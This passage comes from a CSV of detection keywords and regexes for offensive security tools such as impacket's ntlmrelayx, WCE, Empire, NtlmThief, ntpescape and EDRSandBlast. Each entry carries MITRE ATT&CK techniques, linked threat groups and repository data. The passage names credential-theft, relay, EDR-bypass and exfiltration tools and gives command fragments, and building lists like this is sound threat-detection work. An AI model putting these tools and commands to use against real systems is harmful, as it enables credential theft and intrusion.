Access","https://github.com/erwan2212/NTHASH-FPC","1","1","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","53667" 
"*NTHASH-win64.exe*",".{0,1000}NTHASH\-win64\.exe.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","1","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","53668" "*NTLM credentials successfully changed!*",".{0,1000}NTLM\scredentials\ssuccessfully\schanged!.{0,1000}","offensive_tool_keyword","WCE","manipulates and extracts credentials through NTLM - Kerberos and Digest Authentication","T1003 - T1550.003 - T1555.003 - T1557.001 - T1557.002 - T1078 - T1212","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/returnvar/wce","1","0","#content","N/A","10","2","109","21","2019-09-15T05:26:40Z","2019-01-10T04:10:48Z","53669" "*NTLM credentials successfully deleted!*",".{0,1000}NTLM\scredentials\ssuccessfully\sdeleted!.{0,1000}","offensive_tool_keyword","WCE","manipulates and extracts credentials through NTLM - Kerberos and Digest Authentication","T1003 - T1550.003 - T1555.003 - T1557.001 - T1557.002 - T1078 - T1212","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/returnvar/wce","1","0","#content","N/A","10","2","109","21","2019-09-15T05:26:40Z","2019-01-10T04:10:48Z","53670" "*NTLM 
TlRMTVNTUAACAAAABgAGADgAAAAFAomiESIzRFVmd4gAAAAAAAAAAIAAgAA+AAAABQLODgAAAA9TAE0AQgACAAYAUwBNAEIAAQAWAFMATQBCAC0AVABPAE8ATABLAEkAVAAEABIAcwBtAGIALgBsAG8AYwBhAGwAAwAoAHMAZQByAHYAZQByADIAMAAwADMALgBzAG0AYgAuAGwAbwBjAGEAbAAFABIAcwBtAGIALgBsAG8AYwBhAGwAAAAAAA==*",".{0,1000}NTLM\sTlRMTVNTUAACAAAABgAGADgAAAAFAomiESIzRFVmd4gAAAAAAAAAAIAAgAA\+AAAABQLODgAAAA9TAE0AQgACAAYAUwBNAEIAAQAWAFMATQBCAC0AVABPAE8ATABLAEkAVAAEABIAcwBtAGIALgBsAG8AYwBhAGwAAwAoAHMAZQByAHYAZQByADIAMAAwADMALgBzAG0AYgAuAGwAbwBjAGEAbAAFABIAcwBtAGIALgBsAG8AYwBhAGwAAAAAAA\=\=.{0,1000}","offensive_tool_keyword","Get-NetNTLM","Powershell module to get the NetNTLMv2 hash of the current user","T1110.003 - T1557.001 - T1040","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/elnerd/Get-NetNTLM","1","0","#content","N/A","7","1","93","18","2022-07-05T20:55:33Z","2019-02-11T23:09:54Z","53671" "*ntlm.py *",".{0,1000}ntlm\.py\s.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","53672" "*ntlm_info_enumeration.*",".{0,1000}ntlm_info_enumeration\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","53673" "*NTLMChallengeBase64*",".{0,1000}NTLMChallengeBase64.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Invoke-Tater.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","53674" "*ntlmdecoder.py*",".{0,1000}ntlmdecoder\.py.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004 - T1621","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","1","N/A","N/A","9","10","1070","142","2025-03-19T20:36:21Z","2020-09-25T20:57:42Z","53675" "*NTLMExtract.ps1*",".{0,1000}NTLMExtract\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to 
aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","53676" "*ntlm-info.py*",".{0,1000}ntlm\-info\.py.{0,1000}","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","1","N/A","N/A","8","4","337","63","2024-10-01T11:22:01Z","2016-05-20T04:32:41Z","53677" "*NTLMInjector.ps1*",".{0,1000}NTLMInjector\.ps1.{0,1000}","offensive_tool_keyword","NTLMInjector","restore the user password after a password reset (get the previous hash with DCSync)","T1555 - T1556.003 - T1078 - T1110.003 - T1201 - T1003","TA0001 - 
TA0003 - TA0004 - TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/vletoux/NTLMInjector","1","1","N/A","N/A","10","2","167","29","2017-06-08T19:01:21Z","2017-06-04T07:25:36Z","53678" "*ntlmquic.*",".{0,1000}ntlmquic\..{0,1000}","offensive_tool_keyword","ntlmquic","POC tools for exploring SMB over QUIC protocol","T1210.002 - T1210.003 - T1210.004","TA0001","N/A","N/A","Exploitation tool","https://github.com/xpn/ntlmquic","1","1","N/A","network exploitation tool","6","2","122","15","2022-04-06T11:22:11Z","2022-04-05T13:01:02Z","53679" "*ntlmquic-go*",".{0,1000}ntlmquic\-go.{0,1000}","offensive_tool_keyword","ntlmquic","POC tools for exploring SMB over QUIC protocol","T1210.002 - T1210.003 - T1210.004","TA0001","N/A","N/A","Exploitation tool","https://github.com/xpn/ntlmquic","1","1","N/A","network exploitation tool","6","2","122","15","2022-04-06T11:22:11Z","2022-04-05T13:01:02Z","53680" "*ntlmquic-master*",".{0,1000}ntlmquic\-master.{0,1000}","offensive_tool_keyword","ntlmquic","POC tools for exploring SMB over QUIC protocol","T1210.002 - T1210.003 - T1210.004","TA0001","N/A","N/A","Exploitation tool","https://github.com/xpn/ntlmquic","1","1","N/A","network exploitation tool","6","2","122","15","2022-04-06T11:22:11Z","2022-04-05T13:01:02Z","53681" "*ntlmrecon *",".{0,1000}ntlmrecon\s.{0,1000}","offensive_tool_keyword","NTMLRecon","A fast and flexible NTLM reconnaissance tool without external dependencies. Useful to find out information about NTLM endpoints when working with a large set of potential IP addresses and domains","T1595","TA0009","N/A","N/A","Discovery","https://github.com/pwnfoo/NTLMRecon","1","0","N/A","N/A","N/A","5","481","70","2024-06-24T18:11:12Z","2019-12-01T06:06:30Z","53682" "*ntlmrecon.csv*",".{0,1000}ntlmrecon\.csv.{0,1000}","offensive_tool_keyword","NTMLRecon","A fast and flexible NTLM reconnaissance tool without external dependencies. 
Useful to find out information about NTLM endpoints when working with a large set of potential IP addresses and domains","T1595","TA0009","N/A","N/A","Discovery","https://github.com/pwnfoo/NTLMRecon","1","1","N/A","N/A","N/A","5","481","70","2024-06-24T18:11:12Z","2019-12-01T06:06:30Z","53683" "*ntlmrecon:main*",".{0,1000}ntlmrecon\:main.{0,1000}","offensive_tool_keyword","NTMLRecon","Enumerate information from NTLM authentication enabled web endpoints","T1212 - T1212.001 - T1071 - T1071.001 - T1087 - T1087.001","TA0009 - TA0007 - TA0006","N/A","N/A","Discovery","https://github.com/puzzlepeaches/NTLMRecon","1","0","N/A","N/A","8","1","35","3","2023-08-16T14:34:10Z","2023-08-09T12:10:42Z","53684" "*ntlmrecon-fromfile.csv*",".{0,1000}ntlmrecon\-fromfile\.csv.{0,1000}","offensive_tool_keyword","NTMLRecon","A fast and flexible NTLM reconnaissance tool without external dependencies. Useful to find out information about NTLM endpoints when working with a large set of potential IP addresses and domains","T1595","TA0009","N/A","N/A","Discovery","https://github.com/pwnfoo/NTLMRecon","1","1","N/A","N/A","N/A","5","481","70","2024-06-24T18:11:12Z","2019-12-01T06:06:30Z","53685" "*NTLMRecon-master*",".{0,1000}NTLMRecon\-master.{0,1000}","offensive_tool_keyword","NTMLRecon","Enumerate information from NTLM authentication enabled web endpoints","T1212 - T1212.001 - T1071 - T1071.001 - T1087 - T1087.001","TA0009 - TA0007 - TA0006","N/A","N/A","Discovery","https://github.com/puzzlepeaches/NTLMRecon","1","1","N/A","N/A","8","1","35","3","2023-08-16T14:34:10Z","2023-08-09T12:10:42Z","53686" "*ntlmrecon-ranges.csv*",".{0,1000}ntlmrecon\-ranges\.csv.{0,1000}","offensive_tool_keyword","NTMLRecon","A fast and flexible NTLM reconnaissance tool without external dependencies. 
Useful to find out information about NTLM endpoints when working with a large set of potential IP addresses and domains","T1595","TA0009","N/A","N/A","Discovery","https://github.com/pwnfoo/NTLMRecon","1","1","N/A","N/A","N/A","5","481","70","2024-06-24T18:11:12Z","2019-12-01T06:06:30Z","53687" "*NTLMRelay2Self.git*",".{0,1000}NTLMRelay2Self\.git.{0,1000}","offensive_tool_keyword","NTLMRelay2Self","An other No-Fix LPE - NTLMRelay2Self over HTTP (Webdav).","T1078 - T1078.004 - T1557 - T1557.001 - T1068","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/med0x2e/NTLMRelay2Self","1","1","N/A","N/A","10","5","400","42","2024-01-27T08:52:03Z","2022-04-30T10:05:02Z","53688" "*ntlmRelayToEWS -*",".{0,1000}ntlmRelayToEWS\s\-.{0,1000}","offensive_tool_keyword","NtlmRelayToEWS","ntlmRelayToEWS is a tool for performing ntlm relay attacks on Exchange Web Services (EWS)","T1212 - T1557 - T1040 - T1078","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/Arno0x/NtlmRelayToEWS","1","0","N/A","N/A","10","4","331","60","2018-01-15T12:48:02Z","2017-10-13T18:00:50Z","53689" "*ntlmRelayToEWS.py*",".{0,1000}ntlmRelayToEWS\.py.{0,1000}","offensive_tool_keyword","NtlmRelayToEWS","ntlmRelayToEWS is a tool for performing ntlm relay attacks on Exchange Web Services (EWS)","T1212 - T1557 - T1040 - T1078","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/Arno0x/NtlmRelayToEWS","1","1","N/A","N/A","10","4","331","60","2018-01-15T12:48:02Z","2017-10-13T18:00:50Z","53690" "*NtlmRelayToEWS-master*",".{0,1000}NtlmRelayToEWS\-master.{0,1000}","offensive_tool_keyword","NtlmRelayToEWS","ntlmRelayToEWS is a tool for performing ntlm relay attacks on Exchange Web Services (EWS)","T1212 - T1557 - T1040 - T1078","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/Arno0x/NtlmRelayToEWS","1","1","N/A","N/A","10","4","331","60","2018-01-15T12:48:02Z","2017-10-13T18:00:50Z","53691" "*ntlmrelayx 
-*",".{0,1000}ntlmrelayx\s\-.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","53692" "*ntlmrelayx --*",".{0,1000}ntlmrelayx\s\-\-.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Example command to relay the hash to authenticate as local admin (if the service account has these privileges) and run calc.exe. Omit the -c parameter to attempt a secretsdump instead.","T1550 - T1555 - T1212 - T1558","N/A","N/A","Black Basta","Exploitation tool","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","53693" "*ntlmrelayx.*",".{0,1000}ntlmrelayx\..{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","53694" "*ntlmrelayx.exe*",".{0,1000}ntlmrelayx\.exe.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/LuemmelSec/ntlmrelayx.py_to_exe","1","1","N/A","N/A","10","1","86","17","2023-05-26T05:35:52Z","2023-05-15T17:58:26Z","53695" "*ntlmrelayx.py*",".{0,1000}ntlmrelayx\.py.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","1","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","53696" "*ntlmrelayx.py*",".{0,1000}ntlmrelayx\.py.{0,1000}","offensive_tool_keyword","lsarelayx","lsarelayx is system wide NTLM relay tool designed to relay incoming NTLM based authentication to the host it is running on","T1557.001 - T1187 - T1558","TA0001 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/CCob/lsarelayx","1","1","N/A","N/A","10","6","562","69","2023-04-25T23:15:33Z","2021-11-12T18:55:01Z","53697" "*ntlmrelayx.py*",".{0,1000}ntlmrelayx\.py.{0,1000}","offensive_tool_keyword","pretender","MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS - LLMNR and NetBIOS-NS spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - TA0009","N/A","N/A","Sniffing & 
Spoofing","https://github.com/RedTeamPentesting/pretender","1","1","N/A","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","53698" "*ntlmrelayx.py*",".{0,1000}ntlmrelayx\.py.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","1","N/A","N/A","10","10","1382","215","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z","53699" "*ntlmrelayx.py.log*",".{0,1000}ntlmrelayx\.py\.log.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","N/A","10","10","1190","163","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z","53700" "*ntlmrelayx.py_to_exe*",".{0,1000}ntlmrelayx\.py_to_exe.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/LuemmelSec/ntlmrelayx.py_to_exe","1","1","N/A","N/A","10","1","86","17","2023-05-26T05:35:52Z","2023-05-15T17:58:26Z","53701" "*ntlmrelayx_original.py*",".{0,1000}ntlmrelayx_original\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/LuemmelSec/ntlmrelayx.py_to_exe","1","1","N/A","N/A","10","1","86","17","2023-05-26T05:35:52Z","2023-05-15T17:58:26Z","53702" "*ntlmscan.py*",".{0,1000}ntlmscan\.py.{0,1000}","offensive_tool_keyword","ntlmscan","scan for NTLM directories","T1087 - T1083","TA0006","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/ntlmscan","1","1","N/A","N/A","N/A","4","359","57","2024-06-27T11:10:32Z","2019-10-23T06:02:56Z","53703" "*ntlmscan-master.zip*",".{0,1000}ntlmscan\-master\.zip.{0,1000}","offensive_tool_keyword","ntlmscan","scan for NTLM directories","T1087 - T1083","TA0006","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/ntlmscan","1","1","N/A","N/A","N/A","4","359","57","2024-06-27T11:10:32Z","2019-10-23T06:02:56Z","53704" "*NTLMSleuth.ps1*",".{0,1000}NTLMSleuth\.ps1.{0,1000}","offensive_tool_keyword","NTLMSleuth","verify NTLM hash integrity against the robust database of ntlm.pw.","T1003 - T1555","TA0006","N/A","Black Basta","Credential Access","https://github.com/jmarr73/NTLMSleuth","1","1","N/A","N/A","8","1","8","0","2024-08-28T15:21:10Z","2023-12-12T16:41:35Z","53705" "*NTLMSleuth.sh*",".{0,1000}NTLMSleuth\.sh.{0,1000}","offensive_tool_keyword","NTLMSleuth","verify NTLM hash integrity against the robust database of ntlm.pw.","T1003 - T1555","TA0006","N/A","Black Basta","Credential 
Access","https://github.com/jmarr73/NTLMSleuth","1","1","N/A","N/A","8","1","8","0","2024-08-28T15:21:10Z","2023-12-12T16:41:35Z","53706" "*NtlmThief.exe*",".{0,1000}NtlmThief\.exe.{0,1000}","offensive_tool_keyword","NtlmThief","Extracting NetNTLM without touching lsass.exe","T1558.003 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/MzHmO/NtlmThief","1","1","N/A","N/A","10","3","235","33","2023-11-27T14:50:10Z","2023-11-26T08:14:50Z","53707" "*NtlmThief.sln*",".{0,1000}NtlmThief\.sln.{0,1000}","offensive_tool_keyword","NtlmThief","Extracting NetNTLM without touching lsass.exe","T1558.003 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/MzHmO/NtlmThief","1","1","N/A","N/A","10","3","235","33","2023-11-27T14:50:10Z","2023-11-26T08:14:50Z","53708" "*NtlmThief.vcxproj*",".{0,1000}NtlmThief\.vcxproj.{0,1000}","offensive_tool_keyword","NtlmThief","Extracting NetNTLM without touching lsass.exe","T1558.003 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/MzHmO/NtlmThief","1","1","N/A","N/A","10","3","235","33","2023-11-27T14:50:10Z","2023-11-26T08:14:50Z","53709" "*NtlmThief-main*",".{0,1000}NtlmThief\-main.{0,1000}","offensive_tool_keyword","NtlmThief","Extracting NetNTLM without touching lsass.exe","T1558.003 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/MzHmO/NtlmThief","1","1","N/A","N/A","10","3","235","33","2023-11-27T14:50:10Z","2023-11-26T08:14:50Z","53710" "*ntlmv1.py --ntlmv1 *::*",".{0,1000}ntlmv1\.py\s\-\-ntlmv1\s.{0,1000}\:\:.{0,1000}","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential 
Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","0","N/A","N/A","10","9","842","113","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z","53711" "*ntlmv1.py*",".{0,1000}ntlmv1\.py.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","53712" "*ntlmv1_check*",".{0,1000}ntlmv1_check.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","53713" "*ntlmv1-multi --ntlmv1 *",".{0,1000}ntlmv1\-multi\s\-\-ntlmv1\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","53714" "*NtoskrnlOffsets.csv*",".{0,1000}NtoskrnlOffsets\.csv.{0,1000}","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - 
TA0005","N/A","COZY BEAR","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","0","N/A","N/A","10","10","1633","292","2024-08-30T20:30:31Z","2021-11-02T15:02:42Z","53716" "*ntpescape*recv*",".{0,1000}ntpescape.{0,1000}recv.{0,1000}","offensive_tool_keyword","ntpescape","ntpescape is a tool that can stealthily (but slowly) exfiltrate data from a computer using the Network Time Protocol (NTP).","T1048 - T1071.004","TA0010 - TA0009","N/A","Black Basta","Data Exfiltration","https://github.com/evallen/ntpescape","1","0","N/A","N/A","10","2","138","15","2023-11-14T18:54:14Z","2022-09-22T16:25:15Z","53717" "*ntpescape*send*",".{0,1000}ntpescape.{0,1000}send.{0,1000}","offensive_tool_keyword","ntpescape","ntpescape is a tool that can stealthily (but slowly) exfiltrate data from a computer using the Network Time Protocol (NTP).","T1048 - T1071.004","TA0010 - TA0009","N/A","Black Basta","Data Exfiltration","https://github.com/evallen/ntpescape","1","0","N/A","N/A","10","2","138","15","2023-11-14T18:54:14Z","2022-09-22T16:25:15Z","53718" "*ntpescape-master.*",".{0,1000}ntpescape\-master\..{0,1000}","offensive_tool_keyword","ntpescape","ntpescape is a tool that can stealthily (but slowly) exfiltrate data from a computer using the Network Time Protocol (NTP).","T1048 - T1071.004","TA0010 - TA0009","N/A","Black Basta","Data 